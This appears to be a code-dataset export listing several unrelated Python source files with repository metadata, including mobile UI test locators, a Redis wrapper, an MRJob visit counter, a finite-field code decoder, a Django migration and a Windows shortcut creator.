blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
281
content_id
stringlengths
40
40
detected_licenses
listlengths
0
57
license_type
stringclasses
2 values
repo_name
stringlengths
6
116
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
313 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
18.2k
668M
star_events_count
int64
0
102k
fork_events_count
int64
0
38.2k
gha_license_id
stringclasses
17 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
107 values
src_encoding
stringclasses
20 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
4
6.02M
extension
stringclasses
78 values
content
stringlengths
2
6.02M
authors
listlengths
1
1
author
stringlengths
0
175
138d7251e99fd5b8de87425401cfefea55cd6357
84065ee4fb4ebeb8cb2cf1d3f6f385d2c56d787e
/page/__init__.py
359e38e1661042b3715145fd8b364217bb2881c4
[]
no_license
bian-py/app_kefu_code
59ed0bcf247e5dd7b06e0f91cdd9563faa49ce60
2f84a152bdc2c226f2bcb6aabc34f0a5313c094e
refs/heads/master
2023-01-28T11:17:40.984458
2020-12-08T11:07:50
2020-12-08T11:07:50
319,289,680
0
0
null
null
null
null
UTF-8
Python
false
false
7,863
py
from selenium.webdriver.common.by import By # 以下是服务器页面配置信息 fwq_new = By.XPATH, '//*[contains(@content-desc,"添加新的服务器")]' fwq_hand_input = By.XPATH, '//*[contains(@content-desc,"手工输入")]' fwq_scan_code = By.XPATH, '//*[contains(@content-desc,"扫码二维码")]' fwq_input_name = By.XPATH, """//android.view.View[@content-desc="{{ 'server.name' | trans }}"]/../../android.widget.EditText""" fwq_input_URL = By.XPATH, """//android.view.View[@content-desc="{{ 'm.api.url' | trans }}"]/../../android.widget.EditText""" fwq_save_btn = By.XPATH, '//*[contains(@content-desc,"保存")]' fwq_confirm = By.XPATH, '//*[contains(@content-desc,"{}")]' fwq_url_error = By.XPATH, "//*[@content-desc = '无法连接到API']" fwq_swipe_area = By.XPATH, "//android.view.View[@scrollable = 'true']" fwq_back_btn = By.XPATH, "//*[@content-desc = '编辑服务器']/../android.widget.Button" fwq_modify_btn = By.XPATH, '//*[contains(@content-desc,"我的服务器 http://192.168.1.10/kefu/php/app.php?mobile-api")]' \ '/../android.view.View[2]/android.view.View[1]/android.widget.Button' fwq_delete_btn = By.XPATH, '//*[contains(@content-desc,"我的服务器 http://192.168.1.10/kefu/php/app.php?mobile-api")]' \ '/../android.view.View[2]/android.view.View[2]/android.widget.Button' fwq_delete_confirm_btn = By.XPATH, '//*[@content-desc="删除 "]' # 以下是登录页面配置信息 login_username = By.XPATH, '//android.view.View[@content-desc="登陆"]/../../android.widget.EditText' login_password = By.XPATH, '//android.view.View[@content-desc="密码"]/../../android.widget.EditText' login_confirm_btn = By.XPATH, '//android.widget.Button[@content-desc="登陆 "]' login_cancel_btn = By.XPATH, '//android.widget.Button[@content-desc="取消 "]' login_if_success = By.XPATH, '//android.view.View[@content-desc="我的服务器"]/../android.widget.Button' login_logout = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]' login_error_confirm = By.XPATH, '//android.widget.Button[@content-desc="OK "]' login_error_info = By.XPATH, '//android.widget.Button[@content-desc="OK "]/../android.view.View[2]' # 
以下是用户列表页面配置信息 def get_user_self_element(username): loc = By.XPATH, '//android.view.View[@content-desc="{}"]'.format(username) return loc user_details_page = By.XPATH, '//android.view.View[@content-desc="用户详细信息"]' user_details_page_back_btn = By.XPATH, '//android.view.View[@content-desc="用户详细信息"]/../android.widget.Button' user_details_send_btn = By.XPATH, '//android.widget.Button[contains(@content-desc,"发送消息 ")]' user_conversation_page = By.XPATH, '//android.view.View[@content-desc="会话"]' user_conversation_page_back_btn = By.XPATH, '//android.view.View[@content-desc="会话"]/../android.widget.Button' user_bottom_btn_talk_list = By.XPATH, '//android.view.View[contains(@content-desc,"会话 会话")]/android.view.View/android.view.View' user_bottom_btn_user_list = By.XPATH, '//android.view.View[contains(@content-desc,"在线用户 在线用户")]/android.view.View/android.view.View' user_talk_input = By.CLASS_NAME, 'android.widget.EditText' user_talk_input_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[3]' # 以下是导航栏配置信息 dhl_menu = By.XPATH, '//android.view.View[@content-desc="我的服务器"]/../android.widget.Button' dhl_logout = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]' dhl_user = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[1]' dhl_talk = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[2]' dhl_history = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[3]' dhl_view = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[4]' dhl_if_user = By.XPATH, '//android.view.View[@content-desc=" 匿名用户"]' dhl_if_history = By.XPATH, '//android.widget.Button[contains(@content-desc,"搜索 ")]' dhl_if_view = 'org.chromium.webview_shell' dhl_if_view_for_android_6 = 'com.android.browser' dhl_if_logout = By.XPATH, '//*[contains(@content-desc,"添加新的服务器")]' dhl_back_from_talk = By.XPATH, '//android.view.View[contains(@content-desc,"在线用户 
在线用户")]/android.view.View/android.view.View' # 以下是会话页面配置信息 def get_talk_list_element(username): loc = By.XPATH, '//android.view.View[@content-desc="{}"]'.format(username) return loc def search_history_msg(msg): loc = By.XPATH, '//android.view.View[@content-desc="{}"]'.format(msg) return loc talk_bottom_btn = By.XPATH, '//android.view.View[contains(@content-desc,"会话 会话")]/android.view.View/android.view.View' talk_back_to_list = By.XPATH, '//android.view.View[@content-desc="会话"]/../android.widget.Button' talk_input = By.CLASS_NAME, 'android.widget.EditText' talk_input_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[3]' talk_emoji_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[2]' talk_menu_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[1]' talk_attachment_btn = By.XPATH, '//android.widget.EditText/../../android.view.View[2]/android.view.View[1]' talk_attachment_for_6_arth = By.ID,'com.android.packageinstaller:id/permission_allow_button' talk_attachment_enter = By.XPATH, '//android.widget.TextView[contains(@text,"文")]' talk_attachment_file_menu = By.XPATH, '//android.widget.ImageButton[@content-desc="显示根目录"]' talk_attachment_download = By.XPATH, "//android.widget.TextView[@text = '下载']" talk_attachment = By.XPATH, "//android.widget.TextView[@text = 'timg.png']" talk_attachment_if = By.XPATH, '//android.view.View[@content-desc="timg.png"]' talk_emoji_select = By.XPATH, '//android.view.View[@content-desc="emot-3"]' talk_emoji_if = By.XPATH, '//android.widget.Image[@content-desc="emot-3"]' talk_menu_invite_user = By.XPATH, '//android.view.View[contains(@content-desc,"邀请会话")]' talk_invite_user = By.XPATH, '//android.view.View[@content-desc="test05"]' talk_invite_user2 = By.XPATH, '//android.view.View[@content-desc="test04"]' talk_invite_if = By.XPATH, '//android.view.View[@content-desc=") 已被邀请参加会谈"]' talk_menu_exit = By.XPATH, '//android.view.View[contains(@content-desc,"离开会话")]' talk_menu_cancel = 
By.XPATH, '//android.widget.Button[@content-desc="取消 "]' # 以下是历史记录页面配置信息 history_enter = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[3]' history_username_input = By.XPATH, '''//android.view.View[@content-desc="{{ 'user.name' | trans }}"]/../../android.widget.EditText''' history_email_input = By.XPATH, '''//android.view.View[@content-desc="{{ 'user.email' | trans }}"]/../../android.widget.EditText''' history_search_btn = By.XPATH, '//android.widget.Button[contains(@content-desc,"搜索 ")]' history_username_if_success = By.XPATH, '//android.view.View[@content-desc="test04, test05"]' history_email_if_success = By.XPATH, '//android.view.View[@content-desc="test04, test03"]' history_date_start_btn = By.XPATH, '''//android.widget.Spinner[@content-desc="{{ 'from.date' | trans }} "]''' history_date_end_btn = By.XPATH, '''//android.widget.Spinner[@content-desc="{{ 'to.date' | trans }} "]''' history_data_start = By.XPATH, '//android.view.View[@content-desc="06 十二月 2020"]' history_data_end = By.XPATH, '//android.view.View[@content-desc="07 十二月 2020"]' history_date_set_btn = By.ID, 'android:id/button1' history_check_if1 = By.XPATH, '//android.view.View[@content-desc="历史会话"]' history_check_if2 = By.XPATH, '//android.view.View[@content-desc="这是test03发给test04的历史信息"]'
[ "334783747@qq.com" ]
334783747@qq.com
6531ca24dc8b784514654a38e162071710663772
5bdaea14397df8fcb07a98f82450d81cdd5d778b
/src/service/statistics/score_statistics_service.py
0d1929c8ce9a233e5a1ec1ee856aa7fdb882dfa5
[]
no_license
RodrigoDeRosa/ConectarSaludServer
5b30c90487a767de122f94e6b81934e7fd641378
8d2602dc22143e85fdfbfcbd883d33c18164cfb4
refs/heads/master
2022-11-20T13:57:42.317373
2020-07-12T18:41:05
2020-07-12T18:41:05
258,001,795
0
0
null
null
null
null
UTF-8
Python
false
false
2,154
py
from datetime import datetime from src.database.daos.consultation_dao import ConsultationDAO class ScoreStatisticsService: @classmethod async def get_statistics(cls, doctor_id: str, from_date: datetime, to_date: datetime, specialty: str): """ Retrieve scoring statistics and adapt for response. """ if doctor_id: score_by_date, detail = await cls.__get_scoring_data(doctor_id, from_date, to_date, specialty) else: score_by_date, detail = await cls.__get_scoring_data(None, from_date, to_date, specialty) # Map to API model date_score_list = [] for date, pair in score_by_date.items(): date_score_list.append( { 'date': date.strftime('%d-%m-%Y'), 'average_score': pair[0] } ) # Return all information return date_score_list, detail @classmethod async def __get_scoring_data(cls, doctor_id, from_date, to_date, specialty): # Retrieve consultations consultations = await ConsultationDAO.finished_consultations(from_date, doctor_id, to_date, specialty) # Group consultations by date score_by_date = dict() for consultation in consultations: consultation_date = datetime.combine(consultation.creation_date.date(), datetime.min.time()) # Calculate new average if consultation_date not in score_by_date: score_by_date[consultation_date] = 1, consultation.score else: count, average = score_by_date[consultation_date] score_by_date[consultation_date] = count + 1, float((average + consultation.score) / (count + 1)) # Get the detail of the score of every consultation detail = [ { 'score': consultation.score, 'opinion': consultation.score_opinion, 'date': consultation.creation_date.strftime('%d-%m-%Y') } for consultation in consultations ] # Return statistic data return score_by_date, detail
[ "rodrigo.derosa@despegar.com" ]
rodrigo.derosa@despegar.com
ee70005f6474b587eee09a190290dc11f5c5439e
4d7b2858eb43506f822e1c3c906bee287186b2a9
/pizza_project/lib/__init__.py
f0acbff325741a8764e1c8595c7766f74b4ceaf7
[]
no_license
byt3-m3/da_pizza_house
c4d98b1c3246aa48256b368a69fad4046bf19691
01d163b511428b442e8d8f97bc4408e6060851db
refs/heads/master
2022-12-08T03:52:02.487557
2020-09-01T21:06:32
2020-09-01T21:06:32
292,047,731
0
0
null
null
null
null
UTF-8
Python
false
false
79
py
from pizza_project.lib.inventory import * from pizza_project.lib.store import *
[ "cbaxtertech@gmail.com" ]
cbaxtertech@gmail.com
366b74b3e20dae7c6b4d55ed70cd676b8ed2c615
7a3ac2f27b2afb16d7e872d07d019b81be597417
/NonAdditivePartition.py
f564c2f374087a55d26293fe03c95accefa7333b
[]
no_license
TropicalMaster/Master
8519cc555a87ef5a9d1076ae3cd987e791215c6e
eb682eff7e13e967ad7a37f5c145895a96da4396
refs/heads/main
2023-04-13T14:35:55.910513
2021-04-18T20:23:14
2021-04-18T20:23:14
359,234,494
0
0
null
null
null
null
UTF-8
Python
false
false
9,038
py
from sympy import * from math import * import copy from finiteField import * from random import randint class PartitionCodes(): def __init__(self, n, k, s, FF): self.n = n self.k = k self.s = s self.FF = FF self.q = FF.q self.p = FF.p # Define I to be any subspace of F_q expressed in exponent representation # of F_q^m element = [0] element.extend([0 for i in range(n-1)]) element = self.FF.invext(element,True) self.I = [element] self.basis = [[i] for i in range(n)] # Create q-Vandermonde matrix of basis (Transposed Moore matrix) # Shifted because [i] = q^i in this case, but still holds self.M = self.qvan(self.basis,self.n) # Matrix inversion self.M_inv = self.FF.inv(copy.deepcopy(self.M)) # Create a q-vandermonde matrix of input elements # a: vector containing alpha element degrees of length n # s: the number of rows in sxn matrix, the range of q-degrees to raise the a elements to def qvan(self,a,s): # Initializing the matrix matrix = [] # Going through the range s for i in range(s): row = [] # Going through each element in the "a" vector for elem in a: if len(elem) != 0: elem = elem[0] # Raising the existing element degrees to q^i (* because "a" elements are given in degrees) elem = (elem * (self.q**(self.s*i))) % self.p row.append([elem]) else: row.append([]) # Append the row to the matrix matrix.append(row) return matrix # Calculate the norm def norm(self,a): deg = int((self.q**(2*self.n) - 1)/(self.q-1)) % self.p if len(a): norm = [(a[0]*deg) % self.p] return norm else: return [] def modifiedBM(self,g): r = 0 L = 0 # Initializing polynomials with q-degree 0 Lambda = [[0],[0]] B = [[0],[0]] while r <= len(g)-1: # Find delta_r as g_r + sum delta_r = g[r].copy() # Sum of Lambda coefficients multiplied with g coefficients for i in range(L): # Check whether g[r-i] is zero if len(g[r-(i+1)]): coeff = [(Lambda[0][i+1] + g[r-(i+1)][0]*self.q**(self.s*(i+1))) % self.p] delta_r = self.FF.add(delta_r,coeff,"+") # Condition if len(delta_r) == 0: B = 
self.FF.composite([0],B[0],[self.s],B[1]) else: # Copy current Lambda Lambda_temp = copy.deepcopy(Lambda) # Find lambda - delta*x^[1]*B composite = self.FF.composite(delta_r,B[0],[self.s],B[1]) Lambda = self.FF.addComp(Lambda[0],composite[0],Lambda[1],composite[1],"-") if 2*L > r: B = self.FF.composite([0],B[0],[self.s],B[1]) else: # Multiply Lambda_temp with the inverse of delta_r for i in range(len(Lambda_temp[0])): Lambda_temp[0][i] = (Lambda_temp[0][i] - delta_r[0]) % self.p # Define new B polynomial as Lambda_temp B = copy.deepcopy(Lambda_temp) # Increase L L = r + 1 - L r = r + 1 # Negate coefficients because of relation for i in range(len(Lambda[0])): Lambda[0][i] = self.FF.add([],[Lambda[0][i]],"-")[0] return [L, Lambda, B] def partialBM(self,L,Lambda,B,r,g): # Find delta_r as g_r + sum delta_r = [g[r][0]] # Sum of Lambda coefficients multiplied with g coefficients for i in range(L): # Check whether g[r-i] is zero if len(g[r-(i+1)]): coeff = [(Lambda[0][i+1] + g[r-(i+1)][0]*self.q**(self.s*(i+1))) % self.p] delta_r = self.FF.add(delta_r,coeff,"+") # Condition if len(delta_r) == 0: B = self.FF.composite([0],B[0],[self.s],B[1]) else: # Copy current Lambda Lambda_temp = copy.deepcopy(Lambda) # Find lambda - delta*x^[1]*B composite = self.FF.composite(delta_r,B[0],[self.s],B[1]) Lambda = self.FF.addComp(Lambda[0],composite[0],Lambda[1],composite[1],"-") return L,Lambda,B def PartitionEncoding(self,r): # Change received word according to condition if self.norm(r[0]) not in self.I: if (self.k+1) % 2 == 0: r.append(r[0].copy()) else: r.append(self.FF.add([],r[0],"-")) r[0] = [] codeword = self.FF.Codeword(r,self.M) return codeword def PartitionDecoding(self,f): beta = self.FF.Codeword(f,self.M_inv) if beta[self.k+1:self.n] == [[] for i in range(self.k+1,self.n)]: print("Decoded word", beta) return beta # Berlekamp-Massey algorithm on coefficients from k+1 to 2n from beta t0, Lambda, B = self.modifiedBM(beta[self.k+1:self.n]) g = copy.deepcopy(beta) g_sols = [] 
lambda_vectors = [] if t0 == int((self.n-self.k)/2): t,Lambda,B = self.modifiedBM(g[self.k:self.n]) # Find g_0 g_0 = [] for i in range(1,t+1): coeff = [(Lambda[0][i] + g[self.n-i][0]*self.q**(self.s*i)) % self.p] g_0 = self.FF.add(g_0,coeff,"+") # Check if norm(g[0]-g_0) in I if self.norm(self.FF.add(g[0],g_0,"-")) in self.I: # Add to solution set lambda_vectors.append(Lambda[0].copy()) g_sols.append(copy.deepcopy(beta)) # Create a copy of g, and add g_0 at the end to find BM(g_k+1,g_n+1) g_temp = copy.deepcopy(g) g_temp.append(g[0].copy()) t,Lambda,B = self.modifiedBM(g_temp[self.k+1:self.n+1]) # Find g_k g_k_temp = [] for i in range(1,t): coeff = [(Lambda[0][i] + g[self.k+t-i][0]*self.q**(self.s*i)) % self.p] g_k_temp = self.FF.add(g_k_temp,coeff,"+") g_kt = [(g[self.k+t][0]*self.q**(self.s*(self.n+t))) % self.p] g_k = self.FF.add(g_kt,g_k_temp,"-") g_k = [(g_k[0]-Lambda[0][t]) % self.p] norm = self.norm(self.FF.add(g[self.k],g_k,"-")) # Negate norm element if nks is odd if (self.n*self.k*self.s) % 2 != 0: norm = self.FF.add([],norm,"-") # Check norm(g[k]-g_k) not in I if norm not in self.I: # Negate according to encoding if (self.k+1) % 2 != 0: g_k = self.FF.add([],g_k,"-") # Add to solution set g[self.k] = g_k lambda_vectors.append(Lambda[0].copy()) g_sols.append(g) else: lambda_vectors.append(Lambda[0].copy()) g_sols.append(g) for l in range(len(g_sols)): g = g_sols[l] lambda_vector = lambda_vectors[l] # Check periodicity check = 0 checklimit = 3 for i in range(self.n+checklimit): g_i = [] for j in range(1,t0+1): # Subscript of g is i-j % 2n k = (i-j) % (self.n) if len(g[k]): coeff = [(lambda_vector[j] + g[k][0]*self.q**(j*self.s)) % self.p] g_i = self.FF.add(g_i, coeff,"+") if i < self.n: g[i] = g_i else: if g_i == g[i % self.n]: check += 1 if check == checklimit: # Recover the codeword elements c = [] for i in range(self.n): e_i = [] for j in range(self.n): if len(g[j]): coeff = [(g[j][0] + self.basis[i][0]*self.q**(j*self.s)) % self.p] e_i = 
self.FF.add(e_i, coeff,"+") c_i = self.FF.add(f[i],e_i,"-") c.append(c_i) print("Decoded codeword ",c,"\n") return c else: if l == 2: print("Decoding Failure") return "Decoding Failure"
[ "noreply@github.com" ]
noreply@github.com
7765cc67a607b9556d7c75470b892c02b3fe5707
f208676788a901f4b66fa0a5809ef5563c1d5471
/classy_vision/hooks/classy_hook.py
ad5c0a900f8643ca8ed1f247fd4a4e113ac37853
[ "MIT" ]
permissive
cwb96/ClassyVision
10e47703ec3989260840efe22db94720122f9e66
597a929b820efdd914cd21672d3947fa9c26d55e
refs/heads/master
2021-02-18T03:35:51.520837
2020-03-05T05:41:24
2020-03-05T05:43:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,321
py
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from abc import ABC, abstractmethod from typing import Any, Dict from classy_vision import tasks class ClassyHookState: """Class to store state within instances of ClassyHook. Any serializable data can be stored in the instance's attributes. """ def get_classy_state(self) -> Dict[str, Any]: return self.__dict__ def set_classy_state(self, state_dict: Dict[str, Any]): self.__dict__ = state_dict class ClassyHook(ABC): """Base class for hooks. Hooks allow to inject behavior at different places of the training loop, which are listed below in the chronological order. on_start -> on_phase_start -> on_step -> on_phase_end -> on_end Deriving classes should call ``super().__init__()`` and store any state in ``self.state``. Any state added to this property should be serializable. E.g. - .. code-block:: python class MyHook(ClassyHook): def __init__(self, a, b): super().__init__() self.state.a = [1,2,3] self.state.b = "my_hook" # the following line is not allowed # self.state.my_lambda = lambda x: x^2 """ def __init__(self): self.state = ClassyHookState() def _noop(self, *args, **kwargs) -> None: """Derived classes can set their hook functions to this. This is useful if they want those hook functions to not do anything. 
""" pass @classmethod def name(cls) -> str: """Returns the name of the class.""" return cls.__name__ @abstractmethod def on_start(self, task: "tasks.ClassyTask") -> None: """Called at the start of training.""" pass @abstractmethod def on_phase_start( self, task: "tasks.ClassyTask", local_variables: Dict[str, Any] ) -> None: """Called at the start of each phase.""" pass @abstractmethod def on_step(self, task: "tasks.ClassyTask") -> None: """Called each time after parameters have been updated by the optimizer.""" pass @abstractmethod def on_phase_end( self, task: "tasks.ClassyTask", local_variables: Dict[str, Any] ) -> None: """Called at the end of each phase (epoch).""" pass @abstractmethod def on_end(self, task: "tasks.ClassyTask") -> None: """Called at the end of training.""" pass def get_classy_state(self) -> Dict[str, Any]: """Get the state of the ClassyHook. The returned state is used for checkpointing. Returns: A state dictionary containing the state of the hook.\ """ return self.state.get_classy_state() def set_classy_state(self, state_dict: Dict[str, Any]) -> None: """Set the state of the ClassyHook. Args: state_dict: The state dictionary. Must be the output of a call to :func:`get_classy_state`. This is used to load the state of the hook from a checkpoint. """ self.state.set_classy_state(state_dict)
[ "facebook-github-bot@users.noreply.github.com" ]
facebook-github-bot@users.noreply.github.com
216caab0b5058a6593ec79eaea114a1cd0914296
33334ad1f60c4a87603e7540925295592a83d936
/devel/_setup_util.py
0a9748349517f3448bae0a7e728ddd41ed0316f3
[]
no_license
ChristianBachla/Mini2
4a1db3061252dbc8ec615c558ceba0631805709e
8b33c7f6979595a34d5131d0a4d24cee1a01a531
refs/heads/master
2020-05-02T05:26:35.978532
2019-03-27T11:54:53
2019-03-27T11:54:53
177,771,744
0
0
null
null
null
null
UTF-8
Python
false
false
87
py
/home/hellden/car_tracker_workspace/devel/.private/catkin_tools_prebuild/_setup_util.py
[ "bjarkehellden@gmail.com" ]
bjarkehellden@gmail.com
99fc086a4b21a32651d739916b777c4fb89ede9e
aa6bfa0ded0d1df8b364938342a94215ec7b3aea
/commons/redis_server.py
8c8de4d3139f7811cccb25ec695fe8804d413901
[]
no_license
bobowang2017/miaosha
48bcc3fca753d9bac7d627c5e548e0aae8e44cb9
80d7bbc74407de451f27033febfacfca81c79ab8
refs/heads/master
2020-04-13T17:42:12.625287
2019-01-11T03:41:20
2019-01-11T03:41:20
163,354,827
0
0
null
null
null
null
UTF-8
Python
false
false
1,619
py
# coding: utf-8 import redis from miaosha.settings import REDIS_CONFIG redis_valid_time = 60 * 60 class RedisClient: @property def redis_client(self): pool = redis.ConnectionPool(host=REDIS_CONFIG['host'], port=REDIS_CONFIG['port']) client = redis.Redis(connection_pool=pool) return client def get_instance(self, prefix, key, delete_cache=False): """根据key获取value(string类型数据操作)""" redis_instance = self.redis_client.get('%s:%s' % (prefix, str(key))) if not redis_instance: return None try: res = eval(redis_instance) except: res = str(redis_instance, encoding='utf-8') if delete_cache: self.redis_client.delete(key) return res def set_instance(self, prefix, key, value, default_valid_time=redis_valid_time): """设置键值对(string类型数据操作)""" return self.redis_client.set('%s:%s' % (prefix, str(key)), value, default_valid_time) def delete(self, prefix, key): """删除键值对(string类型数据操作)""" return self.redis_client.delete('%s:%s' % (prefix, str(key))) def incr_instance(self, prefix, key, amount=1): """根据key自增amount(string类型数据操作)""" return self.redis_client.incr('%s:%s' % (prefix, str(key)), amount) def decr_instance(self, prefix, key, amount=1): """根据key自减amount(string类型数据操作)""" return self.redis_client.decr('%s:%s' % (prefix, str(key)), amount) redis_cli = RedisClient()
[ "anini456123" ]
anini456123
2ba398639002ee6e73bb66baf9147410fb204a72
d03c99cf4e11775ea7c0391623ebf4bba1e9963f
/week4/mostFrequentVisitors.py
c672781de863a6967cc6b81b2ef0ba3d1f8dc11e
[ "MIT" ]
permissive
avinashsc/w261
ce939155bc7662594a5d17129ed96840d251f287
fb0cf538015093496f87f0c07ecdb63db93d0094
refs/heads/master
2020-04-21T19:45:07.023063
2016-12-08T01:48:38
2016-12-08T01:48:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,756
py
#!/usr/bin/python from mrjob.job import MRJob from mrjob.step import MRStep from mrjob.protocol import RawValueProtocol import re import operator class mostFrequentVisitors(MRJob): OUTPUT_PROTOCOL = RawValueProtocol URLs = {} def steps(self): return [MRStep( mapper = self.mapper, combiner = self.combiner, reducer_init = self.reducer_init, reducer = self.reducer )] def mapper(self, _, line): data = re.split(",",line) pageID = data[1] custID = data[4] yield pageID,{custID:1} def combiner(self,pageID,visits): allVisits = {} for visit in visits: for custID in visit.keys(): allVisits.setdefault(custID,0) allVisits[custID] += visit[custID] yield pageID,allVisits def reducer_init(self): with open("anonymous-msweb.data", "r") as IF: for line in IF: try: line = line.strip() data = re.split(",",line) URL = data[4] pageID = data[1] self.URLs[pageID] = URL except IndexError: pass def reducer(self,pageID,visits): allVisits = {} for visit in visits: for custID in visit.keys(): allVisits.setdefault(custID,0) allVisits[custID] += visit[custID] custID = max(allVisits.items(), key=operator.itemgetter(1))[0] yield None,self.URLs[pageID]+","+pageID+","+custID+","+str(allVisits[custID]) if __name__ == '__main__': mostFrequentVisitors.run()
[ "jason.sanchez@blueowl.xyz" ]
jason.sanchez@blueowl.xyz
db860d3e1bb35d91e4c7bfda9a9b157a682e6979
f4cab8397849c2972c76d258f81041ef650de472
/blog/migrations/0001_initial.py
b35df6ce2593128dc315f01e4e2d0d8af358fa64
[]
no_license
paner28/mysite
964a8510d15347227ed53309ca0423762764b458
6aa58933dd4ca2821bd5ca602f29bf139997d1cd
refs/heads/main
2023-03-27T13:20:52.620308
2021-03-26T06:35:37
2021-03-26T06:35:37
351,673,700
0
0
null
null
null
null
UTF-8
Python
false
false
2,597
py
# Generated by Django 3.1.7 on 2021-03-26 05:40 from django.db import migrations, models import mdeditor.fields class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AnimeModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('image', models.TextField(default='https://i.gzn.jp/img/2019/12/14/anime-2020winter/00.png')), ('title', models.CharField(max_length=30)), ('content', models.TextField()), ('hp', models.TextField(default='https://www.tus.ac.jp/')), ('infomation', models.TextField(default='特になし')), ('date', models.DateField(auto_now=True)), ('category', models.CharField(choices=[('Greate', 'イチオシ'), ('Now', '現在'), ('Old', '過去')], max_length=50)), ], ), migrations.CreateModel( name='BlogModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100)), ('content', mdeditor.fields.MDTextField()), ('postdate', models.DateField(auto_now_add=True)), ('editdate', models.DateField(auto_now=True)), ('category', models.CharField(choices=[('math', '数学'), ('program', 'プログラミング'), ('game', 'ゲーム'), ('sports', 'スポーツ'), ('anime', 'アニメ'), ('prime', '素数大富豪'), ('life', '日常'), ('other', 'その他')], max_length=50)), ], ), migrations.CreateModel( name='RamennModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.TextField()), ('postdate', models.DateField(auto_now_add=True)), ('content', models.CharField(max_length=400)), ('picture', models.FileField(upload_to='static/img/Ramenn/')), ], ), migrations.CreateModel( name='SampleModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100)), ('number', models.IntegerField()), ], ), ]
[ "toshi23masa@gmail.com" ]
toshi23masa@gmail.com
45bb8fa9ff7cac2a617fde9225c823719d4b209b
467c8b99507ccabd0d89042fb0510af88d387ec3
/test/1.createShortcut/src/createShortcut.py
21d3f05d98922c6071fe048b7a2fc3c39182bbeb
[]
no_license
Kosuke-Tomita/python
5f5741a59ec097922a3d17decee4012578628dff
8ffad74c912a2a08fe94947e29dee6434d6a1c03
refs/heads/master
2020-07-21T15:47:41.166210
2019-09-08T01:47:38
2019-09-08T01:47:38
206,912,586
0
0
null
null
null
null
UTF-8
Python
false
false
1,717
py
import tkinter from tkinter import messagebox as tkMessageBox from tkinter import filedialog as tkFileDialog import os import sys from pathlib import Path import os.path import win32com.client import datetime class FolderDialog: def __init__(self): pass def showFD(self): root=tkinter.Tk() root.withdraw() iDir='c:/' dirPath=tkFileDialog.askdirectory(initialdir=iDir) return dirPath class ShortCut: def __init__(self,parentFolderPath): self.folderPath = parentFolderPath def createShortCut(self,saveFilePath): shell = win32com.client.Dispatch('WScript.shell') shCut = shell.CreateShortcut(os.path.join(self.folderPath,os.path.basename(saveFilePath)+".lnk")) shCut.TargetPath = saveFilePath shCut.WindowStyle = 1 shCut.IconLocation = saveFilePath shCut.WorkingDirectory = self.folderPath shCut.Save() #ショートカット作成のための親フォルダ取得 fd = FolderDialog() fileFolderPath = fd.showFD() if fileFolderPath in (None,''): sys.exit() #ショートカット保存フォルダ作成 dt = datetime.datetime.now() dtStr = dt.strftime('%Y%m%d_%H%M%S_%f')[:-3] saveFolderPath = os.path.join(os.getcwd(), 'shortcut' + '_' + dtStr) os.mkdir(saveFolderPath) #ショートカット作成 shortCut = ShortCut(saveFolderPath) p = Path(fileFolderPath) for filePath in list(p.iterdir()): shortCut.createShortCut(str(filePath)) # for path in list(p.glob('*')): # message += str(path) + '\n' # if message != '': # tkMessageBox.showinfo('FolderInfo', message) # else: # tkMessageBox.showinfo('FolderInfo', 'NoFile')
[ "54474920+Kosuke-Tomita@users.noreply.github.com" ]
54474920+Kosuke-Tomita@users.noreply.github.com
bb34326efa7e8876f71ebe51e16711253c542128
d925859a64460fb73a065cefe4601701c4858178
/lib/generator/providers/football.py
5c3b5b388e47b51a89451f0c54fb519435e7a079
[ "MIT" ]
permissive
vikkio88/pyDsManager
6493ffe481f5ce2ffc11376cfb3c52195637f4b6
018e08f7db0852f4653c4da6db851551783584a1
refs/heads/master
2021-01-10T01:27:20.853049
2015-12-21T19:14:45
2015-12-21T19:14:45
47,927,280
0
0
null
null
null
null
UTF-8
Python
false
false
167
py
football = { 'clubs': [ 'Football Club', 'Sporting', 'FC', 'United', 'Sport', 'Soccer', 'Football' ] }
[ "vincenzo.ciaccio@timesofmalta.com" ]
vincenzo.ciaccio@timesofmalta.com
35e69a6e70d95cbb060ad0ce9122bcdba0e15a07
36b81a830b04542383adf40b47894960f65bdec6
/chemtools/calculators/dalton.py
1161ca0f8e692918bca26808c0105b1448b4f261
[ "MIT" ]
permissive
lmmentel/chemtools
c3f8f26b3e4baca89988a5f414e33364a09394bc
6d395063a332d76a44919b6b4cf558b8178091dc
refs/heads/master
2023-08-25T12:46:16.500358
2023-08-07T15:47:45
2023-08-07T15:47:45
245,623,218
13
8
MIT
2023-08-30T00:19:17
2020-03-07T11:49:57
Python
UTF-8
Python
false
false
6,528
py
